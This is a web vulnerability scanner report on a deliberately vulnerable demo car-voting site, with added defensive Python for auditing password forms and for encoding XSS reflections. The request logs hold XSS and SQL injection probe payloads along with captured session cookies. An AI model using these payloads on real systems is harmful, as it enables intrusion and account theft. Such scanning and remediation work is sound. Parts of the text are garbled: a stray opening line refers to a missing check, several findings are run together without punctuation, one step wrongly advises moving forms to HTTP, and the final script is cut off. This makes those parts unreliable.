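The tokenizer check is deliberately structural rather than a search for the string "netsparker": the marker text is still present in the hardened output, but only as character data, which is exactly the distinction the Notes in finding 9 ask a manual reviewer to make.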
IMPORTANT: 1 total, 1 confirmed

5. Password Transmitted over HTTP
Netsparker detected that password data is being transmitted over HTTP.

Impact
If an attacker can intercept network traffic, he/she can steal users' credentials.

Actions to Take
1. See the remedy for solution.
2. Move all of your critical forms and pages to HTTP and do not serve them over HTTP.

Remedy
All sensitive data should be transferred over HTTPS rather than HTTP. Forms should be served over HTTPS. All aspects of the application that accept user input, starting from the login process, should only be served over HTTPS.

Classification
OWASP 2010-A9, OWASP 2013-A6, PCI v2.0-6.5.4, PCI v3.0-6.5.4, CWE-319, CAPEC-65, WASC-04

5.1 /Account/Register CONFIRMED
http://hackyourselffirst.troyhunt.com/Account/Register
Form target action: http://hackyourselffirst.troyhunt.com/Account/Register

Request
GET /Account/Register HTTP/1.1
Cache-Control: no-cache
Referer: http://hackyourselffirst.troyhunt.com/
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1750.170 Safari/537.36
Accept-Language: en-us,en;q=0.5
X-Scanner: Netsparker
Host: hackyourselffirst.troyhunt.com
Cookie: ASP.NET_SessionId=eykomas2qwtytb2b4i3u3rvj; VisitStart=8/25/2014 10:57:52 PM; AuthCookie=57007E5718C949BB9DC8E5A74B45AFB8C217ACFD8FD98F8023C637FF8D1BABD440D2F2AD0AF35F86E8F32E6C454628305E619D8676ED718595618D220E725F2F5813F5A4B4604461ADB93EF796E499FE922687BE7848361F0CDEE483E11F997A92B2760021E9744C920EF124EEE2381E87A6A46642104F351292394B396FA228; ARRAffinity=676a03b62014623bb78415d33912c3b249f249141dd561816e83926ee7df9d29
Accept-Encoding: gzip, deflate

Response
HTTP/1.1 200 OK
Cache-Control: private
Date: Mon, 25 Aug 2014 22:58:38 GMT
Vary: Accept-Encoding
Server: Microsoft-IIS/8.0
X-XSS-Protection: 0
X-AspNetMvc-Version: 5.1
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Content-Encoding:
Content-Length: 2265
Content-Type: text/html; charset=utf-8

<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="utf-8" />
<title>Register - Supercar Showdown</title>
<link href="/favicon.ico" rel="shortcut icon" type="image/x-icon" />
<meta name="viewport" content="width=device-width" />
<link href="/Content/site?v=94ys6lTNFlsmnNPD5EyUiGtWGzSZmuEQGdWkL_-WEEI1" rel="stylesheet"/>
</head><body><header class="navbar-wrapper"><div class="container"><div class="navbar navbar-inverse"><div class="navbar-inner">
<button type="button" class="btn btn-navbar" data-toggle="collapse" data-target=".nav-collapse"><span class="icon-bar"></span><span class="icon-bar"></span><span class="icon-bar"></span></button>
<a class="brand" href="http://hackyourselffirst.troyhunt.com/">Supercar Showdown</a>
<div class="nav-collapse collapse"><ul class="nav">
<li><a href="http://hackyourselffirst.troyhunt.com/Supercar/Leaderboard">Leaderboard</a></li>
<li class="dropdown"><a href="#" class="dropdown-toggle" data-toggle="dropdown">My account <b class="caret"></b></a>
<ul class="dropdown-menu">
<form action="http://hackyourselffirst.troyhunt.com/Account/LogOff" id="logoutForm" method="post" class="navbar-form"></form>
<li><a href="https://hackyourselffirst.troyhunt.com/Account/ChangePassword">Change password</a></li>
<li><a href="http://hackyourselffirst.troyhunt.com/Account/UserProfile">Edit profile</a></li>
…
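Findings 5.1 and 8.1 are the same weakness seen from two angles: /Account/Login is served over HTTP but posts to HTTPS (an on-path attacker edits the page before the user types anything), while /Account/Register both serves and submits over HTTP (the password itself crosses the wire in clear). The script below is an added example, not Netsparker's or the site's code, that applies one check to both cases: it collects every form containing a password field, resolves the action against the page URL and reports a finding when either the page or the action is plain HTTP. The form markup is constructed to stand in for the truncated page bodies above; only the URLs come from the report, and the field names are assumed.

```python
from html.parser import HTMLParser
from typing import Dict, List, Optional
from urllib.parse import urljoin, urlsplit

# Constructed fragments standing in for the truncated page bodies in findings 5.1 and 8.1.
# Keys are the URLs the pages were fetched from; the third page is a clean control case.
SAMPLE_PAGES = {
    "http://hackyourselffirst.troyhunt.com/Account/Login":
        '<form action="https://hackyourselffirst.troyhunt.com/Account/Login" method="post">'
        '<input name="Email" type="email"><input name="Password" type="password">'
        '<input type="submit" value="Log in"></form>',
    "http://hackyourselffirst.troyhunt.com/Account/Register":
        '<form action="http://hackyourselffirst.troyhunt.com/Account/Register" method="post">'
        '<input name="Email" type="email"><input name="Password" type="password">'
        '<input name="ConfirmPassword" type="password"></form>',
    "https://hackyourselffirst.troyhunt.com/Account/ChangePassword":
        '<form action="/Account/ChangePassword" method="post">'
        '<input name="OldPassword" type="password"><input name="NewPassword" type="password"></form>',
}


class FormCollector(HTMLParser):
    """Records each <form> with its resolved action URL and whether it holds a password field."""

    def __init__(self, page_url: str) -> None:
        super().__init__()
        self.page_url = page_url
        self.forms: List[Dict[str, object]] = []
        self._current: Optional[Dict[str, object]] = None

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag == "form":
            # A relative or missing action submits back to the page's own URL.
            self._current = {"action": urljoin(self.page_url, a.get("action") or ""), "has_password": False}
            self.forms.append(self._current)
        elif tag == "input" and self._current is not None and (a.get("type") or "").lower() == "password":
            self._current["has_password"] = True

    def handle_endtag(self, tag):
        if tag == "form":
            self._current = None


def audit_critical_forms(pages: Dict[str, str]) -> List[str]:
    """One finding per password form that is served over HTTP or submits over HTTP.

    Both cases matter: an https action does not help when the page carrying the
    form arrives over http, because an on-path attacker can rewrite the action or
    add script before the user ever enters a password.
    """
    findings: List[str] = []
    for page_url, body in pages.items():
        collector = FormCollector(page_url)
        collector.feed(body)
        for form in collector.forms:
            if not form["has_password"]:
                continue
            page_https = urlsplit(page_url).scheme == "https"
            action_https = urlsplit(str(form["action"])).scheme == "https"
            if not action_https:
                findings.append(f"{page_url}: password transmitted over HTTP (action {form['action']})")
            elif not page_https:
                findings.append(f"{page_url}: critical form served over HTTP (action is HTTPS)")
    return findings


if __name__ == "__main__":
    for line in audit_critical_forms(SAMPLE_PAGES):
        print(line)
```

Run against a real crawl, feed the check every response with Content-Type text/html and the final URL after redirects, since a page that redirects from http to https before rendering is not served over HTTP in the sense that matters here.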
20 57
1 TOTALIMPORTANT
CONFIRMED
1
6 Cookie Not Marked as SecureNetsparkeridentifiedacookienotmarkedassecureandtransmittedoverHTTPS
Thismeansthecookiecouldpotentiallybestolenbyanattackerwhocansuccessfullyinterceptanddecryptthetrafficorfollowingasuccessfulman-in-the-middleattack
ImpactThiscookiewillbetransmittedoveraHTTPconnectionthereforeifthiscookieisimportant(such as a session cookie)anattackermightinterceptitandhijackavictimssessionIftheattackercancarryoutaman-in-the-middleattackheshecanforcethevictimtomakeanHTTPrequesttostealthecookie
Actions to Take1 Seetheremedyforsolution2 Markallcookiesusedwithintheapplicationassecure(If the cookie is not related to authentication or does not carry any personal
information you do not have to mark it as secure)
RemedyMarkallcookiesusedwithintheapplicationassecure
Required Skills for Successful ExploitationToexploitthisissuetheattackerneedstobeabletointercepttrafficThisgenerallyrequireslocalaccesstothewebserverortothevictimsnetworkAttackersneedtobeunderstandlayer2havephysicalaccesstosystemseitheraswaypointsforthetrafficorhavelocallygainedaccesstotoasystembetweenthevictimandthewebserver
External ReferencesNETCookieSecurePropertyHowtoCreateTotallySecureCookies
ClassificationOWASP2010-A9OWASP2013-A6PCIV20-654PCIV30-654CWE-614CAPEC-102WASC-15
61 AccountLogin CONFIRMEDhttpshackyourselffirsttroyhuntcomAccountLogin
Identified CookieAuthCookie
RequestPOST AccountLogin HTTP11Cache-Control no-cacheReferer httphackyourselffirsttroyhuntcomAccountLoginAccept textxmlapplicationxmlapplicationxhtml+xmltexthtmlq=09textplainq=08imagepngq=05User-Agent Mozilla50 (Windows NT 63 WOW64) AppleWebKit53736 (KHTML like Gecko) Chrome3301750170 Safari53736Accept-Language en-usenq=05X-Scanner NetsparkerHost hackyourselffirsttroyhuntcomCookie ASPNET_SessionId=eykomas2qwtytb2b4i3u3rvj VisitStart=8252014 105752 PMAuthCookie=EA9A3D322DD4B030B3239FA3119364226C4AFC1146DACC18C04B897769A79F835F0F451B34A8B312CD8F5A77E3B5421B58074E3E4C68E5FA779CCC709E259C828EFF4936F4BB152D308EA778C82324B3CAF1BA60C0C18C134AEB7C5A5153AF181C536B617EF3F6DFB1052DDB94CFEB3F91DCFE08967136E4266A5E8249781E2F ARRAffinity=676a03b62014623bb78415d33912c3b249f249141dd561816e83926ee7df9d29Accept-Encoding gzip deflateContent-Length 57Content-Type applicationx-www-form-urlencoded
Email=netsparker40examplecomampPassword=3ampRememberMe=true
21 57
ResponseHTTP11 302 FoundCache-Control privateDate Mon 25 Aug 2014 225900 GMTLocation httphackyourselffirsttroyhuntcomServer Microsoft-IIS80Set-CookieAuthCookie=83F87081CDBC4CAC96FBBA3C773F139F952893E2A76E1B1AD3A6E8C32B935F9A14A7467ADD80BBC637E096BB698E00D1E437A060334677EA4A758738F5F619C1C59687F889818B80FF72D699D7B9FEA6F2F89F33E2A38DABBD39EEE2F5538787A104A63D8131741D813003A6B1E980EF52692C81A2395EB8B18B21613B890AF7 expires=Tue 25-Aug-2015 225900 GMT path=Password=Mw== expires=Tue 25-Aug-2015 225900 GMT path=Email=netsparkerexamplecom expires=Tue 25-Aug-2015 225900 GMT path=
X-XSS-Protection 0X-AspNetMvc-Version 51X-AspNet-Version 4030319X-Powered-By ASPNETContent-Length 155Content-Type texthtml charset=utf-8
lthtmlgtltheadgtlttitlegtObject movedlttitlegtltheadgtltbodygtlth2gtObject moved to lta href=httphackyourselffirsttroyhuntcomgthereltagtlth2gtltbodygtlthtmlgt
22 57
1 TOTALIMPORTANT
7 Out-of-date Version (Microsoft SQL Server)Netsparkeridentifiedyouareusinganout-of-dateversionofMicrosoftSQL
ImpactSincethisisanoldversionofthesoftwareitmaybevulnerabletoattacks
RemedyPleaseupgradeyourinstallationofMicrosoftSQLServertothelateststableversion
ClassificationOWASP2010-A6OWASP2013-A9PCIV20-61PCIV30-61CAPEC-310
71 Make1httphackyourselffirsttroyhuntcomMake1orderby=(select+convert(int2cCHAR(95)2bCHAR(33)2bCHA
Identified Version110922217
Latest Version12002000
Vulnerability DatabaseResult is based on 18082014 vulnerability database content
Certainty
RequestGET Make1orderby=(select+convert(int2cCHAR(95)2bCHAR(33)2bCHAR(64)2bCHAR(50)2bCHAR(100)2bCHAR(105)2bCHAR(108)2bCHAR(101)2bCHAR(109)2bCHAR(109)2bCHAR(97))+FROM+syscolumns) HTTP11Cache-Control no-cacheReferer httphackyourselffirsttroyhuntcomAccept textxmlapplicationxmlapplicationxhtml+xmltexthtmlq=09textplainq=08imagepngq=05User-Agent Mozilla50 (Windows NT 63 WOW64) AppleWebKit53736 (KHTML like Gecko) Chrome3301750170 Safari53736Accept-Language en-usenq=05X-Scanner NetsparkerHost hackyourselffirsttroyhuntcomCookie ASPNET_SessionId=eykomas2qwtytb2b4i3u3rvj VisitStart=8252014 105752 PMAuthCookie=70C1996BFE542E03455FD23A7DF6BAFC4683ACDAB380D9E50281255EC813210887335C804EE36FD13E32AAE41FB0A940B85A5E23846F83F5CC500E6F0D9E1353EFFD9B6AB3040E3CFADA99D3AD65DC3633FD92922B61E8A18F9DD0EF1C993A17FC47536EBB3714036FB3E3DBCD43CB7CF0621AE2D60D3A13BEFA9CDA66241A7D Password=Mw== Email=netsparkerexamplecomARRAffinity=676a03b62014623bb78415d33912c3b249f249141dd561816e83926ee7df9d29Accept-Encoding gzip deflate
23 57
ResponseHTTP11 500 Internal Server ErrorCache-Control privateDate Mon 25 Aug 2014 225955 GMTServer Microsoft-IIS80X-AspNet-Version 4030319X-Powered-By ASPNETContent-Length 14154Content-Type texthtml charset=utf-8
ltDOCTYPE htmlgtlthtmlgtltheadgtlttitlegtConversion failed when converting the varchar value _2dilemma to data type intlttitlegtltmeta name=viewport content=width=device-width gtltstylegtbody font-familyVerdanafont-weightnormalfont-size 7emcolorblack p font-familyVerdanafont-weightnormalcolorblackmargin-top -5pxb font-familyVerdanafont-weightboldcolorblackmargin-top -5pxH1 font-familyVerdanafont-weightnormalfont-size18ptcolorred H2 font-familyVerdanafont-weightnormalfont-size14ptcolormaroon pre font-familyConsolasLucida ConsoleMonospacefont-size11ptmargin0padding05emline-height14ptmarker font-weight bold color blacktext-decoration noneversion color grayerror margin-bottom 10pxexpandable text-decorationunderline font-weightbold colornavy cursorhand media screen and (max-width 639px) pre width 440px overflow auto white-space pre-wrap word-wrap break-word media screen and (max-width 479px) pre width 280px ltstylegtltheadgt
ltbody bgcolor=whitegt
ltspangtltH1gtServer Error in Applicationlthr width=100 size=1 color=silvergtltH1gt
lth2gt ltigtConversion failed when converting the varchar value _2dilemma to data type intltigt lth2gtltspangt
ltfont face=Arial Helvetica Geneva SunSans-Regular sans-serif gt
ltbgt Description ltbgtAn unhandled exception occurred during the execution of the current web request Please reviehellip
24 57
1 TOTALMEDIUM
CONFIRMED
1
8 Critical Form Served over HTTPNetsparkerdetectedthatacriticalformisservedoverHTTP
ImpactIfanattackercancarryoutaman-in-the-middleattackheshemaybeabletointercepttrafficbyinjectingJavaScriptcodeintothispageorchangingactionoftheHTTPcodetostealtheuserspasswordEventhoughthetargetpageisHTTPSthisdoesnotprotectthesystemagainstman-in-the-middleattacks
ThisissueisimportantasitnegatestheuseofSSLasaprivacyprotectionbarrier
Actions to Take1 Seetheremedyforsolution2 MoveallofyourcriticalformstoHTTPSanddonotallowthesepagestobeservedoverHTTP
RemedyAllsensitivedatashouldbetransferredoverHTTPSratherthanHTTPFormsshouldbeservedoverHTTPSAllaspectsoftheapplicationthatacceptuserinputstartingfromtheloginprocessshouldonlybeservedoverHTTPS
ClassificationOWASP2010-A9OWASP2013-A6PCIV20-654PCIV30-654CWE-319CAPEC-65WASC-04
81 AccountLogin CONFIRMEDhttphackyourselffirsttroyhuntcomAccountLogin
Form target actionhttpshackyourselffirsttroyhuntcomAccountLogin
RequestGET AccountLogin HTTP11Cache-Control no-cacheReferer httphackyourselffirsttroyhuntcomAccept textxmlapplicationxmlapplicationxhtml+xmltexthtmlq=09textplainq=08imagepngq=05User-Agent Mozilla50 (Windows NT 63 WOW64) AppleWebKit53736 (KHTML like Gecko) Chrome3301750170 Safari53736Accept-Language en-usenq=05X-Scanner NetsparkerHost hackyourselffirsttroyhuntcomCookie ASPNET_SessionId=eykomas2qwtytb2b4i3u3rvj VisitStart=8252014 105752 PMAuthCookie=57007E5718C949BB9DC8E5A74B45AFB8C217ACFD8FD98F8023C637FF8D1BABD440D2F2AD0AF35F86E8F32E6C454628305E619D8676ED718595618D220E725F2F5813F5A4B4604461ADB93EF796E499FE922687BE7848361F0CDEE483E11F997A92B2760021E9744C920EF124EEE2381E87A6A46642104F351292394B396FA228 ARRAffinity=676a03b62014623bb78415d33912c3b249f249141dd561816e83926ee7df9d29Accept-Encoding gzip deflate
25 57
Response
HTTP/1.1 200 OK
Cache-Control: private
Date: Mon, 25 Aug 2014 22:58:38 GMT
Vary: Accept-Encoding
Server: Microsoft-IIS/8.0
X-XSS-Protection: 0
X-AspNetMvc-Version: 5.1
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Content-Encoding:
Content-Length: 2549
Content-Type: text/html; charset=utf-8

<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="utf-8" />
<title>Log in - Supercar Showdown</title>
<link href="/favicon.ico" rel="shortcut icon" type="image/x-icon" />
<meta name="viewport" content="width=device-width" />
<link href="/Content/site?v=94ys6lTNFlsmnNPD5EyUiGtWGzSZmuEQGdWkL_-WEEI1" rel="stylesheet" />
</head>
<body>
<header class="navbar-wrapper">
<div class="container">
<div class="navbar navbar-inverse">
<div class="navbar-inner">
<button type="button" class="btn btn-navbar" data-toggle="collapse" data-target=".nav-collapse">
<span class="icon-bar"></span><span class="icon-bar"></span><span class="icon-bar"></span>
</button>
<a class="brand" href="http://hackyourselffirst.troyhunt.com/">Supercar Showdown</a>
<div class="nav-collapse collapse">
<ul class="nav">
<li><a href="http://hackyourselffirst.troyhunt.com/Supercar/Leaderboard">Leaderboard</a></li>
<li class="dropdown">
<a href="#" class="dropdown-toggle" data-toggle="dropdown">My account <b class="caret"></b></a>
<ul class="dropdown-menu">
<form action="http://hackyourselffirst.troyhunt.com/Account/LogOff" id="logoutForm" method="post" class="navbar-form"></form>
<li><a href="https://hackyourselffirst.troyhunt.com/Account/ChangePassword">Change password</a></li>
<li><a href="http://hackyourselffirst.troyhunt.com/Account/UserProfile">Edit profile</a></li>
<…
3 TOTAL MEDIUM

9. [Possible] Cross-site Scripting

Netsparker detected possible cross-site scripting, which allows an attacker to execute a dynamic script (JavaScript, VBScript) in the context of the application.
This allows several different attack opportunities, mostly hijacking the current session of the user or changing the look of the page by changing the HTML on the fly to steal the user's credentials. This happens because the input entered by a user has been interpreted as HTML/JavaScript/VBScript by the browser. Cross-site scripting targets the users of the application instead of the server. Although this is a limitation, it still allows attackers to hijack other users' sessions, and an attacker might target an administrator to gain full control over the application.
Although Netsparker believes there is a cross-site scripting in here, it could not confirm it. We strongly recommend investigating the issue manually to ensure it is cross-site scripting and needs to be addressed.

Impact
There are many different attacks that can be leveraged through the use of XSS, including:
Hijacking the user's active session
Changing the look of the page within the victim's browser
Mounting a successful phishing attack
Intercepting data and performing man-in-the-middle attacks

Remedy
This issue occurs because the browser interprets the input as active HTML, JavaScript or VBScript. To avoid this, all input and output from the application should be filtered/encoded. Output should be filtered/encoded according to the output format and location.
There are a number of pre-defined, well structured whitelist libraries available for many different environments. Good examples of these include the OWASP Reform and Microsoft Anti-Cross-Site Scripting libraries.

Remedy References
[ASP.NET] - Microsoft Anti-XSS Library
OWASP XSS Prevention Cheat Sheet

External References
XSS Cheat Sheet
OWASP - Cross-site Scripting
XSS Shell
XSS Tunnelling

Classification
OWASP 2010-A2, OWASP 2013-A3, PCI V2.0-6.5.7, PCI V3.0-6.5.7, CWE-79, CAPEC-19, WASC-08

9.1 /api/vote
http://hackyourselffirst.troyhunt.com/api/vote

Parameters
Parameter   Type   Value
userId      POST   1
supercarId  POST   3
comments    POST   '"--></style></scRipt><scRipt>netsparker(0x000437)</scRipt>

Notes
Due to the Content-Type header of the response, exploitation of this vulnerability might not be possible in all browsers, or might not be possible at all. The Content-Type header indicates that there is a possibility of exploitation by changing the attack. However, Netsparker does not support confirming these issues; you need to confirm this problem manually. Generally, lack of filtering in the response can cause cross-site scripting vulnerabilities in browsers with automatic MIME sniffing, such as Internet Explorer.

Certainty
Request
POST /api/vote HTTP/1.1
Cache-Control: no-cache
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1750.170 Safari/537.36
Accept: */*
Origin: http://hackyourselffirst.troyhunt.com
Referer: http://hackyourselffirst.troyhunt.com/Supercar/3
X-Requested-With: XMLHttpRequest
Accept-Language: en-us,en;q=0.5
X-Scanner: Netsparker
Host: hackyourselffirst.troyhunt.com
Cookie: ASP.NET_SessionId=eykomas2qwtytb2b4i3u3rvj; VisitStart=8/25/2014 10:57:52 PM; AuthCookie=70C1996BFE542E03455FD23A7DF6BAFC4683ACDAB380D9E50281255EC813210887335C804EE36FD13E32AAE41FB0A940B85A5E23846F83F5CC500E6F0D9E1353EFFD9B6AB3040E3CFADA99D3AD65DC3633FD92922B61E8A18F9DD0EF1C993A17FC47536EBB3714036FB3E3DBCD43CB7CF0621AE2D60D3A13BEFA9CDA66241A7D; Password=Mw==; Email=netsparker@example.com; ARRAffinity=676a03b62014623bb78415d33912c3b249f249141dd561816e83926ee7df9d29
Accept-Encoding: gzip, deflate
Content-Length: 90
Content-Type: application/x-www-form-urlencoded; charset=UTF-8

userId=1&supercarId=3&comments='"--></style></scRipt><scRipt>netsparker(0x000437)</scRipt>

Response
HTTP/1.1 500 Internal Server Error
Cache-Control: no-cache
Date: Mon, 25 Aug 2014 23:20:47 GMT
Pragma: no-cache
Server: Microsoft-IIS/8.0
X-XSS-Protection: 0
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Content-Length: 2985
Content-Type: application/json; charset=utf-8
Expires: -1

{"Message":"An error has occurred.","ExceptionMessage":"Unclosed quotation mark after the character string '--></style></scRipt><scRipt>netsparker(0x000437)</scRipt>')'.\r\nIncorrect syntax near '--></style></scRipt><scRipt>netsparker(0x000437)</scRipt>')'.","ExceptionType":"System.Data.SqlClient.SqlException","StackTrace":"   at System.Data.SqlClient.SqlConnection.OnError(SqlException exception, Boolean breakConnection, Action`1 wrapCloseInAction)\r\n
   at System.Data.SqlClient.SqlInternalConnection.OnError(SqlException exception, Boolean breakConnection, Action`1 wrapCloseInAction)\r\n
   at System.Data.SqlClient.TdsParser.ThrowExceptionAndWarning(TdsParserStateObject stateObj, Boolean callerHasConnectionLock, Boolean asyncClose)\r\n
   at System.Data.SqlClient.TdsParser.TryRun(RunBehavior runBehavior, SqlCommand cmdHandler, SqlDataReader dataStream, BulkCopySimpleResultSet bulkCopyHandler, TdsParserStateObject stateObj, Boolean& dataReady)\r\n
   at System.Data.SqlClient.SqlCommand.RunExecuteNonQueryTds(String methodName, Boolean async, Int32 timeout, Boolean asyncWrite)\r\n
   at System.Data.SqlClient.SqlCommand.InternalExecuteNonQuery(TaskCompletionSource`1 completion, String methodName, Boolean sendToPipe, Int32 timeout, Boolean asyncWrite)\r\n
   at System.Data.SqlClient.SqlCommand.ExecuteNonQuery()\r\n
   at Web.Controllers.VoteController.Post(Vote vote)\r\n
   at lambda_method(Closure , Object , Object[] )\r\n
   at System.Web.Http.Controllers.ReflectedHttpActionDescriptor.ActionExecutor.<>c__DisplayClass10.<GetExecutor>b__9(Object instance, Object[] methodParameters)\r\n
   at System.Web.Http.Controllers.ReflectedHttpActionDescriptor.ActionExecutor.Execute(Object instanc…

9.2 /api/admin
http://hackyourselffirst.troyhunt.com/api/admin?nsextt='%22--%3E%3C/style%3E%3C/scRipt%3E%3CscRipt

Parameters
Parameter   Type   Value
nsextt      GET    '"--></style></scRipt><scRipt>netsparker(0x0002E0)</scRipt>
Notes
Due to the Content-Type header of the response, exploitation of this vulnerability might not be possible in all browsers, or might not be possible at all. The Content-Type header indicates that there is a possibility of exploitation by changing the attack. However, Netsparker does not support confirming these issues; you need to confirm this problem manually. Generally, lack of filtering in the response can cause cross-site scripting vulnerabilities in browsers with automatic MIME sniffing, such as Internet Explorer.

Certainty

Request
GET /api/admin?nsextt='%22--%3E%3C/style%3E%3C/scRipt%3E%3CscRipt%3Enetsparker(0x0002E0)%3C/scRipt%3E HTTP/1.1
Cache-Control: no-cache
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png;q=0.5
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1750.170 Safari/537.36
Accept-Language: en-us,en;q=0.5
X-Scanner: Netsparker
Host: hackyourselffirst.troyhunt.com
Cookie: ASP.NET_SessionId=eykomas2qwtytb2b4i3u3rvj; VisitStart=8/25/2014 10:57:52 PM; AuthCookie=70C1996BFE542E03455FD23A7DF6BAFC4683ACDAB380D9E50281255EC813210887335C804EE36FD13E32AAE41FB0A940B85A5E23846F83F5CC500E6F0D9E1353EFFD9B6AB3040E3CFADA99D3AD65DC3633FD92922B61E8A18F9DD0EF1C993A17FC47536EBB3714036FB3E3DBCD43CB7CF0621AE2D60D3A13BEFA9CDA66241A7D; Password=Mw==; Email=netsparker@example.com; ARRAffinity=676a03b62014623bb78415d33912c3b249f249141dd561816e83926ee7df9d29
Accept-Encoding: gzip, deflate
Injection Request
POST /api/vote HTTP/1.1
Cache-Control: no-cache
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1750.170 Safari/537.36
Accept: */*
Origin: http://hackyourselffirst.troyhunt.com
Referer: http://hackyourselffirst.troyhunt.com/Supercar/3
X-Requested-With: XMLHttpRequest
Accept-Language: en-us,en;q=0.5
X-Scanner: Netsparker
Host: hackyourselffirst.troyhunt.com
Cookie: ASP.NET_SessionId=eykomas2qwtytb2b4i3u3rvj; VisitStart=8/25/2014 10:57:52 PM; AuthCookie=70C1996BFE542E03455FD23A7DF6BAFC4683ACDAB380D9E50281255EC813210887335C804EE36FD13E32AAE41FB0A940B85A5E23846F83F5CC500E6F0D9E1353EFFD9B6AB3040E3CFADA99D3AD65DC3633FD92922B61E8A18F9DD0EF1C993A17FC47536EBB3714036FB3E3DBCD43CB7CF0621AE2D60D3A13BEFA9CDA66241A7D; Password=Mw==; Email=netsparker@example.com; ARRAffinity=676a03b62014623bb78415d33912c3b249f249141dd561816e83926ee7df9d29
Accept-Encoding: gzip, deflate
Content-Length: 77
Content-Type: application/x-www-form-urlencoded; charset=UTF-8

userId=1&supercarId=3&comments=%22%3e%3cnet+sparker%3dnetsparker(0x00043F)%3e

Identification Request
GET /Supercar/3 HTTP/1.1
Cache-Control: no-cache
Referer: http://hackyourselffirst.troyhunt.com/
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png;q=0.5
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1750.170 Safari/537.36
Accept-Language: en-us,en;q=0.5
X-Scanner: Netsparker
Host: hackyourselffirst.troyhunt.com
Cookie: ASP.NET_SessionId=eykomas2qwtytb2b4i3u3rvj; VisitStart=8/25/2014 10:57:52 PM; AuthCookie=70C1996BFE542E03455FD23A7DF6BAFC4683ACDAB380D9E50281255EC813210887335C804EE36FD13E32AAE41FB0A940B85A5E23846F83F5CC500E6F0D9E1353EFFD9B6AB3040E3CFADA99D3AD65DC3633FD92922B61E8A18F9DD0EF1C993A17FC47536EBB3714036FB3E3DBCD43CB7CF0621AE2D60D3A13BEFA9CDA66241A7D; Password=Mw==; Email=netsparker@example.com; ARRAffinity=676a03b62014623bb78415d33912c3b249f249141dd561816e83926ee7df9d29
Accept-Encoding: gzip, deflate

Injection Response
HTTP/1.1 201 Created
Cache-Control: no-cache
Date: Mon, 25 Aug 2014 23:20:53 GMT
Pragma: no-cache
Server: Microsoft-IIS/8.0
X-XSS-Protection: 0
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Content-Length: 0
Expires: -1

Identification Response
…1)) AND ISNULL(ASCII(SUBSTRING(CAST((SELECT @@version) AS varchar(8000)),1,1)),0)=1</td></tr><tr><td>Troy Hunt</td><td>"><net sparker=netsparker(0x00043F)></td></tr><tr><td>Troy Hunt</td><td>-1 OR 1=1) AND ISNULL(ASCII(SUBSTRING(CAST((SELECT @@version) AS varchar(8000)…
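The evidence above for finding 9 has two parts that a manual check should keep apart. The 500 response is a SqlException, so the `comments` parameter reaches SQL unescaped; the report records that separately as a confirmed SQL injection on /api/vote. The XSS probe is merely echoed inside that JSON error body, and a browser will only render it as HTML if it sniffs the content type (the response also sends X-XSS-Protection: 0 and no X-Content-Type-Options header), which is why the finding is only "[Possible]". The Identification Response, by contrast, shows a stored comment written back raw into a text/html table cell on /Supercar/3, and that is the reflection worth confirming. The Python below is an added example, not code from the Netsparker report or from the scanned site: it classifies a reflection by content type, and shows the element-context encoding and the JSON hardening that close each case. The probe strings and response fragments are copied from the requests and responses above (the JSON fragment shortened); the `render_cell_*` and `error_json_hardened` functions are assumed stand-ins for the site's own view and API code.

```python
import html
import json
import re

# Probe bodies as sent by the scanner (URL-decoded), copied from the requests above.
REFLECTED_PROBE = '\'"--></style></scRipt><scRipt>netsparker(0x000437)</scRipt>'
STORED_PROBE = '"><net sparker=netsparker(0x00043F)>'

# Fragments of the two responses above (constructed copies, cut down to the relevant part).
JSON_500_FRAGMENT = (
    '{"Message":"An error has occurred.","ExceptionMessage":"Unclosed quotation mark '
    'after the character string \'--></style></scRipt><scRipt>netsparker(0x000437)'
    '</scRipt>\')\'."}'
)
IDENTIFICATION_FRAGMENT = (
    '<tr><td>Troy Hunt</td><td>"><net sparker=netsparker(0x00043F)></td></tr>'
)

# The two probe shapes used in this report; they only match while their '<' and '>' survive.
_RAW_PROBE = re.compile(
    r"<scRipt>netsparker\(0x[0-9A-Fa-f]+\)</scRipt>|<net\s+sparker=netsparker\(0x[0-9A-Fa-f]+\)>"
)


def classify_reflection(body, content_type):
    """How a probe came back.

    "html"      reflected as live markup in a text/html body: exploitable as-is
    "non-html"  reflected raw under another Content-Type: exploitable only if a
                browser sniffs the body as HTML (the report's "[Possible]" case)
    None        not reflected as markup
    """
    if not _RAW_PROBE.search(body):
        return None
    mime = content_type.split(";", 1)[0].strip().lower()
    return "html" if mime == "text/html" else "non-html"


def render_cell_vulnerable(comment):
    """Assumed stand-in for the leaderboard view: raw concatenation into a <td>."""
    return "<td>" + comment + "</td>"


def render_cell_fixed(comment):
    """Element-context encoding; quote=True also neutralises the '"' that opens the stored probe."""
    return "<td>" + html.escape(comment, quote=True) + "</td>"


def error_json_hardened(message):
    """Assumed stand-in for the API error response.

    json.dumps leaves '<' and '>' alone, so the body is made sniff-proof twice over:
    angle brackets and '&' become \\u escapes (still valid JSON, same value after
    parsing), and X-Content-Type-Options: nosniff stops a browser treating the
    body as HTML in the first place.
    """
    body = json.dumps({"Message": message})
    body = body.replace("<", "\\u003c").replace(">", "\\u003e").replace("&", "\\u0026")
    headers = {
        "Content-Type": "application/json; charset=utf-8",
        "X-Content-Type-Options": "nosniff",
    }
    return headers, body


if __name__ == "__main__":
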